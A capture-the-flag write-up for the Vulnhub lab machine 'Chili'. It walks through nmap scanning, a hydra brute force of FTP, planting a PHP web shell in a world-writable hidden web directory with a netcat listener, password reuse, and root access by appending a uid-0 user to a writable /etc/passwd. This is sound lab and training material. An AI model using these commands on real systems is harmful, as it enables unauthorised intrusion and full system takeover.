Vulnhub - Chili

You can find the machine there > Chili

Summary

This one was a pretty tricky box that i enjoyed a lot! Is easy but you have to think smart. We start by brute forcing FTP this will give us access to all system files, we search for a writeable directory under /var/www/html and we place our shell there. Privilege escalation to root is easy, /etc/passwd is writeable. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ ip=192.168.1.13
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-18 20:15 EEST
Nmap scan report for chili.zte.com.cn (192.168.1.13)
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:14:B9:34 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds
$ nmap -p21,80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-18 20:16 EEST
Nmap scan report for chili.zte.com.cn (192.168.1.13)
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Chili

Port 80 has nothing interesting, i checked /robots.txt i tried directory brute force with gobuster with lot of wordlists but nothing. Anyway i checked the hint that maker provided on vulnhub page If you ever get stuck, try again with the name of the lab ahh here we go, let’s brute force FTP using username chili. (takes some time)

1
2
3
4
5
6
7
8
9
10
11
$ hydra -l chili -P /usr/share/wordlists/rockyou.txt $ip ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-18 20:20:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.1.13:21/
[STATUS] 292.00 tries/min, 292 tries in 00:01h, 14344107 to do in 818:44h, 16 active
[STATUS] 282.67 tries/min, 848 tries in 00:03h, 14343551 to do in 845:44h, 16 active
[STATUS] 286.86 tries/min, 2008 tries in 00:07h, 14342391 to do in 833:19h, 16 active
[STATUS] 284.00 tries/min, 4260 tries in 00:15h, 14340139 to do in 841:34h, 16 active
[21][ftp] host: 192.168.1.13   login: chili   password: a1b2c3d4

Shell as www-data

Perfect, we can login in as chili:a1b2c3d4. I enumerated the system but there is no SSH so only 1 solution left if we upload a shell under /var/www/html but isn’t writable. There is a hidden folder under /var/www/html that is writable:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ ftp $ip
Connected to 192.168.1.13.
220 (vsFTPd 3.0.3)
Name (192.168.1.13:root): chili
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 Sep 08 13:12 .
drwxr-xr-x    3 0        0            4096 Sep 08 11:41 ..
drwxrwxrwx    2 0        0            4096 Sep 08 13:14 .nano <-----
drwxr-xr-x    2 0        0            4096 Sep 08 13:12 .vim
-rw-r--r--    1 0        0           74290 Oct 23  2018 Chile_WEB.jpg
-rw-r--r--    1 0        0             657 Sep 08 11:44 index.html
226 Directory send OK.
ftp> 

Let’s upload a php web shell under .nano and make it executable.

1
2
3
4
5
6
7
8
9
10
ftp> cd .nano
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (38.5256 MB/s)
ftp> chmod 007 shell.php
200 SITE CHMOD command ok.

Now let’s execute it & get shell.

1
$ curl http://$ip/.nano/shell.php
1
2
3
4
5
6
$ nc -lvp 5555
listening on [any] 5555 ...
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@chili:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as chili

We can use the same FTP password to privesc to user chili now.

1
2
3
4
5
6
www-data@chili:/$ su - chili
Password: a1b2c3d4

chili@chili:~$ whoami;id
chili
uid=1000(chili) gid=1000(chili) groups=1000(chili),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Shell as root

After some enumeration, i found that /etc/passwd is writable. Let’s simply add a root user in.

1
2
chili@chili:~$ ls -la /etc/passwd
-rw-r--rw- 1 root root 1450 Sep  8 12:23 /etc/passwd

Let’s generate a password:

1
2
$ openssl passwd -6 -salt xyz pwned   
$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1

Now we can add our user in.

1
2
3
4
5
6
7
chili@chili:~$ echo 'pwned:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0::/root:/bin/bash' >> /etc/passwd
chili@chili:~$ su - pwned
Password: pwned

root@chili:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read the flag.

1
2
root@chili:~# cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b

Lot of fun! :smile: